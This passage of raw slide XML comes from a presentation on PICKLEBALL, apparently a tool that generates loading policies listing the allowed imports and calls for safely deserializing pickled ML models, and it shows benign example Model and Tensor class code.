              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Python library source code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Google Shape;775;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645325" y="2155500"/>
            <a:ext cx="2756700" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Invocations:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Google Shape;776;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607550" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Generated loading policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Google Shape;778;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710150" y="2239550"/>
            <a:ext cx="479400" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="779" name="Google Shape;779;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181000" y="2409425"/>
            <a:ext cx="479400" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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3" name="Shape 783"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Google Shape;784;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Google Shape;785;p64"/>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786" name="Google Shape;786;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="2155500"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
